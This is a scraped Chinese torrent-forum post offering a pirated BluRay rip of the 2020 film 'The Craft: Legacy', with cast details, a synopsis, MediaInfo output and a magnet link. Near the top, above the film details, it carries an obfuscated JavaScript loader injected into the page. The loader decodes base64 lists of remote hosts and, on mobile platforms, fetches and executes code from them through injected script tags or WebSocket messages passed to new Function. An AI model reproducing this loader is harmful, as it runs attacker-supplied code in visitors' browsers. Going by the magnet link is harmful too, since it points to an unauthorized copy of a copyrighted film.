魔女游戏[中文字幕]Legacy.2020.1080p.BluRay.x264.DTS-迅雷下载 8.64GB

版主小s 20天前 357

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 魔女游戏 / 入魔(台) / 我们的女巫手册(港) / 魔女游戏:遗产 / 新魔女游戏

◎片 名 The Craft: Legacy

◎年 代 2020

◎产 地 美国

◎类 别 剧情 / 恐怖 / 奇幻

◎语 言 英语

◎上映日期 2020-10-28(美国)

◎IMDb链接 https://www.imdb.com/title/tt4685762/

◎豆瓣评分 4.3/10 (896人评价)

◎豆瓣链接 https://movie.douban.com/subject/33384226/

◎片 长 97分钟

◎导 演 佐伊·利斯特·琼斯 Zoe Lister Jones (id:1049834)

◎编 剧 佐伊·利斯特·琼斯 Zoe Lister Jones (id:1049834)

丽恩·贾尼埃克 Leigh Janiak (id:1377370)

◎演 员 卡莉·史派妮 Cailee Spaeny (id:1362560)

大卫·杜楚尼 David Duchovny (id:1022601)

米歇尔·莫纳汉 Michelle Monaghan (id:1000015)

吉第安·艾朵 Gideon Adlon (id:1333777)

尼古拉斯·加利齐纳 Nicholas Galitzine (id:1365256)

拉维·西蒙尼 Lovie Simone (id:1416810)

查尔斯·万德瓦尔特 Charles Vandervaart (id:1267440)

小唐纳德·麦克莱恩 Donald MacLean Jr. (id:1436835)

汉娜·戈登 Hannah Gordon (id:1427972)

朱利安·格雷 Julian Grey (id:1431338)

詹姆斯·马奇 James Madge (id:1244956)

◎标 签 奇幻 / 美国 / 恐怖 / 2020 / 剧情 / 翻拍 / 美国电影 / 改编

◎简 介

Blumhouse公司翻拍的经典恐怖片《魔女游戏》确定了导演人选,女导演佐伊·利斯特·琼斯(《创可贴》)将为新片撰写剧本并执导,值得一提的是BlumhouseCEO之前还因对女性导演的言论受到了非议。原版导演中,四个在学校中被孤立的女孩走到了一起,她们希望召唤出鬼神来让自己糟糕的生活得到改变,但怎么会有免费的午餐呢?

  1. General

  2. Unique ID : 184498157957936936580270290442608816140 (0x8ACD0D7E5F778863B5018C582171B00C)

  3. Complete name : [email protected]

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 8.64 GiB

  7. Duration : 1 h 38 min

  8. Overall bit rate : 12.6 Mb/s

  9. Movie name : Legacy 2020

  10. Encoded date : UTC 2021-07-11 09:08:59

  11. Writing application : mkvmerge v59.0.0 ('Shining Star') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 38 min

  25. Bit rate : 11.1 Mb/s

  26. Width : 1 920 pixels

  27. Height : 816 pixels

  28. Display aspect ratio : 2.35:1

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.295

  36. Stream size : 7.60 GiB (88%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=25 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=16.0000 / qcomp=0.70 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.90 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Default : Yes

  40. Forced : No


  41. Audio

  42. ID : 2

  43. ID in the original source medium : 4353 (0x1101)

  44. Format : DTS

  45. Format/Info : Digital Theater Systems

  46. Codec ID : A_DTS

  47. Duration : 1 h 38 min

  48. Bit rate mode : Constant

  49. Bit rate : 1 509 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossy

  56. Stream size : 1.04 GiB (12%)

  57. Language : English

  58. Default : Yes

  59. Forced : No

  60. Original source medium : Blu-ray


  61. Text #1

  62. ID : 3

  63. ID in the original source medium : 4608 (0x1200)

  64. Format : PGS

  65. Muxing mode : zlib

  66. Codec ID : S_HDMV/PGS

  67. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  68. Duration : 1 h 37 min

  69. Bit rate : 15.1 kb/s

  70. Count of elements : 1781

  71. Stream size : 10.6 MiB (0%)

  72. Title : chs

  73. Language : Chinese

  74. Default : No

  75. Forced : No

  76. Original source medium : Blu-ray


  77. Text #2

  78. ID : 4

  79. ID in the original source medium : 4609 (0x1201)

  80. Format : PGS

  81. Muxing mode : zlib

  82. Codec ID : S_HDMV/PGS

  83. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  84. Duration : 1 h 37 min

  85. Bit rate : 15.3 kb/s

  86. Count of elements : 1781

  87. Stream size : 10.7 MiB (0%)

  88. Title : cht

  89. Language : Chinese

  90. Default : No

  91. Forced : No

  92. Original source medium : Blu-ray


  93. Menu

  94. 00:00:00.000 : Chapter 01

  95. 00:12:01.721 : Chapter 02

  96. 00:22:27.346 : Chapter 03

  97. 00:34:46.084 : Chapter 04

  98. 00:49:49.987 : Chapter 05

  99. 01:02:06.723 : Chapter 06

  100. 01:14:00.436 : Chapter 07

  101. 01:26:23.178 : Chapter 08

  102. 01:35:49.744 : Chapter 09


TAGS 奇幻 剧情 恐怖

磁力链:
  • magnet:?xt=urn:btih:9E0FA3B480A1A802B1D9F220F500F07F0E816F92
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回